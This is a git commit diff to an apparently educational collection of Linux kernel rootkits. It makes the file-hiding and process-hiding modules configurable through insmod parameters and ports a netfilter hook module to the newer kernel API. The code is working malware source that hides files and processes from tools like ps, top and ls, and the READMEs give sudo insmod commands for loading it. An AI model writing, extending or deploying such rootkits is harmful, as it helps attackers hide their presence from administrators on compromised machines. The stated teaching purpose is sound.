[+] Add support for input of (filenames & pids to hide as well as Updated NFHook)

README.md

@@ -7,4 +7,4 @@ These rootkits are by no mean real-world rootkits. They have been kept to the mi
 
 All these rootkits have been tested and are fully working on Linux versions 4.x.y
 
-Visit my [blog](https://yassine.tioual.com/index.php/category/rootkit/) for more details.
+Visit my [blog](https://yassine.tioual.com/) for more details.

fhide/README.md

@@ -2,8 +2,8 @@
 
 This rootkit is similar to the
 [PHide](https://github.com/nisay759/linux-rootkits/tree/master/phide) rootkit.
-It hides files beginning with the prefix « rk_ » that are located on the root of
-the filesystem « / »
+By default, it hides files beginning with the prefix « rk_ » that are located on the root of
+the filesystem « / ». But can be changed on the commandline while inserting the rootkit.
 
 ## Compilation ##
 ```
@@ -13,6 +13,8 @@ the filesystem « / »
 ## Installation ##
 ```
 	$ sudo insmod fhide.ko
+	or
+	$ sudo insmod fhide.ko prefix="hideme_" kpath="/tmp/"
 ```
 
 ## Removal ##

fhide/fhide.c

@@ -19,6 +19,11 @@ module_init(fhide_init);
 module_exit(fhide_exit);
 
 static char *prefix = "rk_";
+module_param(prefix, charp, S_IRUGO);
+
+static char *kpath = "/";
+module_param(kpath, charp, S_IRUGO);
+
 struct file_operations proc_fops;
 const struct file_operations *backup_proc_fops;
 struct inode *proc_inode;
@@ -54,7 +59,7 @@ static int __init fhide_init(void)
     printk(KERN_INFO "FHide: LKM succefully loaded!\n");
     struct path p;
 
-    if(kern_path("/", 0, &p))
+    if(kern_path(kpath, 0, &p))
         return 0;
 
     proc_inode = p.dentry->d_inode;
@@ -71,7 +76,7 @@ static void __exit fhide_exit(void)
 {
     struct path p;
     struct inode *proc_inode;
-    if(kern_path("/", 0, &p))
+    if(kern_path(kpath, 0, &p))
         return;
     proc_inode = p.dentry->d_inode;
     proc_inode->i_fop = backup_proc_fops;

nfhook/nfhook.c

@@ -72,15 +72,13 @@ static struct nf_hook_ops rk_pre_routing = {
 static int __init erk_init(void)
 {
 	pr_info("NFhook: LKM succefully loaded!\n");
-
-	nf_register_hook(&rk_pre_routing);
-
+	nf_register_net_hook(&init_net,&rk_pre_routing);
 	return 0;
 }
 
 static void __exit erk_exit(void)
 {
-	nf_unregister_hook(&rk_pre_routing);
+	nf_unregister_net_hook(&init_net,&rk_pre_routing);
 	pr_info("NFhook: LKM succefully unloaded!\n");
 }
 

phide/README.md

@@ -1,7 +1,7 @@
 # PHide : Process Hider #
 
 This is a simple rootkit that hides a process given its pid from tools like ps,
-top, ls... The pid must be specified in the source code.
+top, ls... The pid must be specified in the source code or via the command line when loading the rootkit
 
 More information : https://yassine.tioual.com/index.php/2017/01/10/hiding-processes-for-fun-and-profit/
 
@@ -13,6 +13,8 @@ More information : https://yassine.tioual.com/index.php/2017/01/10/hiding-proces
 ## Installation ##
 ```
 	$ sudo insmod phide.ko
+	or
+	$ sudo insmod phide.ko proc_to_hide="1"
 ```
 
 ## Removal ##

phide/phide.c

@@ -19,6 +19,8 @@ module_init(phide_init);
 module_exit(phide_exit);
 
 static char *proc_to_hide = "1";
+module_param(proc_to_hide, charp, S_IRUGO);
+
 static struct file_operations proc_fops;
 static struct file_operations *backup_proc_fops;
 static struct inode *proc_inode;